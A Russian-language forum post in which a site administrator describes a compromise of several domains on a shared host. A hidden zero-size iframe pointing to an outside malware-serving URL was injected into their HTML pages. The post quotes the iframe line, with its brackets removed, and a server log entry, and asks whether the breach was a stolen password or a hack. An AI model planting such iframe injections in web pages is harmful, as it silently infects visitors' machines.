Скажем так. Есть пример с такой ситуацией.
На серверах V*host есть несколько разных доменов с разным контентом (стандартная услуга почти всех хостеров).
В титульные и некоторые другие html-страницы всех этих сайтов этих доменов были внесены следующие записи:
IFRAME SRC="
http://www.crazy-toolbar.com/home/Ch0ke7/" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME
(первый и последний теги < и > убраны мной специально).
Понятно, что когда пользователь попадет на такую страницу, на его компьютер, извините, начает валиться много всякого д***ма. Также подменяется файл explorer.exe и т.п., и т.д. Реально много. Я даже не сразу все вычистил.
При ознакомлении с логами. Подозрение падает на этот IP
63.148.99.234 domain.biz - [19/May/2005:19:16:58 +0400] "GET / HTTP/1.1" 200 5207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)"
Но в то же время, складывается впечатление, что люди просто напрямую знали пароль. (Вообще, ощущение такое, что строка добавлялась чуть ли не полуавтоматически, так как в разных местах разных html-страниц). Интересны мнения. А также это очередная лажа хостера или поломали чего?